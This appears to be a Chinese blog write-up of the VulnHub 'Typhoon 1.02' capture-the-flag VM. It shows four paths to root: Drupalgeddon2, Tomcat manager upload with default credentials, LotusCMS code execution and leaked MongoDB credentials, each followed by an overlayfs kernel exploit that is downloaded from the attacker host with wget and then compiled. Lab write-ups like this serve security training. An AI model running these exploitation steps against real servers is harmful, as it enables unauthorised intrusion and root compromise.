VM - Typhoon 1.02 的破解
本文主要記錄對 Typhoon 1.02 的滲透學習過程,測試的 VM 主機主要來源 www.vulnhub.com
部落格集:面向 CTF 的 VM 破解系列
下載連結:Typhoon 1.02
VM - Typhoon 1.02 的破解
2019年4月13日22:18:40 【原創】
1. 官方描述
Typhoon Vulnerable VM
名字:Typhoon
Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.
颱風VM包含幾個漏洞和配置錯誤。Typhoon可用於測試網路服務中的漏洞、配置錯誤、脆弱的web應用程式、密碼破解攻擊、許可權升級攻擊、後利用步驟、資訊收集和DNS攻擊。
DHCP service: Enabled
2. Workthrough
設定 kali 和 Typhoon Vulnerable VM 為同一個網段,然後探測IP
root@kali:~# netdiscover -r 10.10.10.0/24
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
root@kali:~# netdiscover -r 10.10.10.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
8 Captured ARP Req/Rep packets, from 4 hosts. Total size: 480
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.10.10.1 00:50:56:c0:00:08 5 300 VMware, Inc.
10.10.10.2 00:50:56:fb:16:b2 1 60 VMware, Inc.
10.10.10.75 00:50:56:33:73:e3 1 60 VMware, Inc.
10.10.10.254 00:50:56:e0:63:df 1 60 VMware, Inc.
根據結果可以看到目標IP為 10.10.10.75
下面使用nmap進行埠探測
root@kali:~# nmap -Pn -p- 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-13 10:36 EDT
Nmap scan report for 10.10.10.75
Host is up (0.00046s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
631/tcp open ipp
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
3306/tcp open mysql
5432/tcp open postgresql
6379/tcp open redis
8080/tcp open http-proxy
27017/tcp open mongod
34675/tcp open unknown
39236/tcp open unknown
43404/tcp open unknown
47275/tcp open unknown
60926/tcp open unknown
MAC Address: 00:50:56:33:73:E3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.55 seconds
上述命令中的 -Pn 是無ping掃描,因為有些主機總是禁用ICMP協議的。-p- 作用與 -p 1-65535 一樣的。
首先測試21埠,使用匿名賬號
root@kali:~# ftp 10.10.10.75
Connected to 10.10.10.75.
220 (vsFTPd 3.0.2)
Name (10.10.10.75:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
發現可以使用匿名賬號( anonymous)登入,但是未發現有價值的資訊。另外分析 vsftpd 的版本(vsFTPd 3.0.2)漏洞,無結果
root@kali:~# nmap -p 21 -A 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-13 10:40 EDT
Nmap scan report for 10.10.10.75
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.10.78
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
方法一:通過CMS Drupal 獲取許可權
下面將目標放在 80 埠上
下面使用 dirb 目錄遍歷
root@kali:~# dirb http://10.10.10.75
START_TIME: Sat Apr 13 10:46:12 2019
URL_BASE: http://10.10.10.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.75/ ----
==> DIRECTORY: http://10.10.10.75/assets/
==> DIRECTORY: http://10.10.10.75/calendar/
+ http://10.10.10.75/cgi-bin/ (CODE:403|SIZE:286)
==> DIRECTORY: http://10.10.10.75/cms/
==> DIRECTORY: http://10.10.10.75/drupal/
+ http://10.10.10.75/index.html (CODE:200|SIZE:3529)
==> DIRECTORY: http://10.10.10.75/javascript/
==> DIRECTORY: http://10.10.10.75/phpmyadmin/
+ http://10.10.10.75/robots.txt (CODE:200|SIZE:37)
+ http://10.10.10.75/server-status (CODE:403|SIZE:291)
可以看到幾個主要的目錄 phpmyadmin、calendar、drupal、cms、robots.txt等
首先訪問 robots.txt
又發現多了一個目錄 mongoadmin。下面從 drupal 開始入手
嘗試找到這個cms的版本
可以看到版本 是 Drupal 8,這個版本是比較老的了,所以嘗試搜尋相關漏洞,發現有程式碼執行漏洞
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST 10.10.10.75
set targeturi drupal/
執行之後則獲取shell
meterpreter > id
[-] Unknown command: id.
meterpreter > shell
Process 2915 created.
Channel 0 created.
獲取核心資訊
uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
發現漏洞
root@kali:~# searchsploit linux 3.13.0
---------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | exploits/linux/local/37293.txt
---------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
kali設定監聽埠
root@kali:~# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
遠端主機中
cd /tmp
wget http://10.10.10.78/37292.c
cd /tmp
gcc 37292.c -o 37292
chmod +x 37292
./37292
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
root-flag
# cat root-flag
<Congrats!>
Typhoon_r00t3r!
</Congrats!>
成功獲取 flag
方法二:通過 MongoDB 獲取許可權
通過nmap的掃描結果可知存在80埠,並且通過dirb可知還存在 robots.txt 檔案
下面訪問 http:// 10.10.10.75/mongoadmin/
獲取使用者名稱和密碼
[username] => typhoon
[password] => 789456123
嘗試使用這個使用者名稱/密碼登入 SSH
root@kali:~# ssh typhoon@10.10.10.75
typhoon@typhoon:~$ uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
typhoon@typhoon:~$ wget http://10.10.10.78/37292.c
typhoon@typhoon:~$ gcc 37292.c -o rootshell
typhoon@typhoon:~$ chmod 777 rootshell
typhoon@typhoon:~$ ./rootshell
typhoon@typhoon:~$ cd /root
typhoon@typhoon:~$ ls
typhoon@typhoon:~$ cat root-flag
<Congrats!>
Typhoon_r00t3r!
</Congrats!>
成功獲取 flag
方法三:通過 Tomcat 獲取許可權
通過 nmap 掃描結果可知開放了 8080 埠
訪問後臺頁面 http:// 10.10.10.75:8080/manager
測試發現使用預設密碼可以登入
[username]:tomcat
[password]:tomcat
登入之後看到存在 war 包上傳頁面,可能會存在漏洞,使用 msf 測試
use exploit/multi/http/tomcat_mgr_upload
set rhost 10.10.10.75
set rport 8080
set httpusername tomcat
set httppassword tomcat
exploit
獲取shell
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)
提權
wget http://10.10.10.78/37292.c
cd /tmp
gcc 37292.c -o 37292
chmod +x 37292
./37292
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
root-flag
# cat root-flag
<Congrats!>
Typhoon_r00t3r!
</Congrats!>
成功獲取 flag
方法四:通過 LotusCMS 獲取許可權
通過 dirb 掃描發現還存在 cms 目錄,訪問發現是一個 LotusCMS 系統
google 搜尋之後發現 LotusCMS 存在 命令執行漏洞
使用 msf 進行測試
use exploit/multi/http/lcms_php_exec
set rhost 10.10.10.75
set uri /cms
exploit
獲取shell
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)
提權
wget http://10.10.10.78/37292.c
cd /tmp
gcc 37292.c -o 37292
chmod +x 37292
./37292
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
# ls
root-flag
# cat root-flag
<Congrats!>
Typhoon_r00t3r!
</Congrats!>
成功獲取 flag
相關文章
- VM - DerpNStink 的破解
- VM - Raven: 1 的破解
- VM - Lazysysadmin 的破解
- 面向 CTF 的 VM 破解系列
- VM - FourAndSix 2.01 的破解
- Flagimation1.02 破解(入門) (3千字)
- VM - 64Base_3mrgnc3 的破解
- VM - CH4INRULZ_v1.0.1 的破解
- VM - 6Days_Lab-v1.0.1 的破解
- VM - JIS-CTF-VulnUpload-CTF01 的破解
- 初學者的東西:Transoft's Server All 1.02破解 (3千字)Server
- 1.02 docker環境的各種搭建方法Docker
- 把ASM下的HDD VM轉換成ARM下Managed Disk的SSD VMASM
- Azure VM的加速網路
- Vm 增加硬碟硬碟
- [VM trunk ports]opensatck VM 單網路卡,多VLAN配置
- 在ARM模式下捕獲VM並建立新VM模式
- 衝擊波1.02源程式 (9千字)
- 【二】ODB - C++ 單表插入(V1.02)C++
- node核心模組-vm
- Oracle VM釋出Oracle
- 【三】ODB - C++ 單表查詢(V1.02)C++
- 【iM_TFTRGB液晶模組】demo例程(版本1.02)釋出
- JAVA VM 與DalvikJava
- docker vm 效能優劣Docker
- css vm用法介紹CSS
- VM 常用命令
- Oracle VM初識(一)Oracle
- Oracle VM初識(二)Oracle
- solaris vm create new lv
- 資料:Java HotSpot VMJavaHotSpot
- 聊聊HotSpot VM的Native Memory TrackingHotSpot
- VM中的Ubuntu(16.04)安裝tenserflowUbuntu
- 正確使用Windows Azure 中的VM RoleWindows
- limo和Dalvik VM的一個思路
- Flutter:VM snapshot must be valid. Check failed: vm. Must be able to initializeFlutterAI
- 【iHMI43 4.3寸液晶模組】demo例程(版本1.02)釋出
- Java的破解和反破解之道 (轉)Java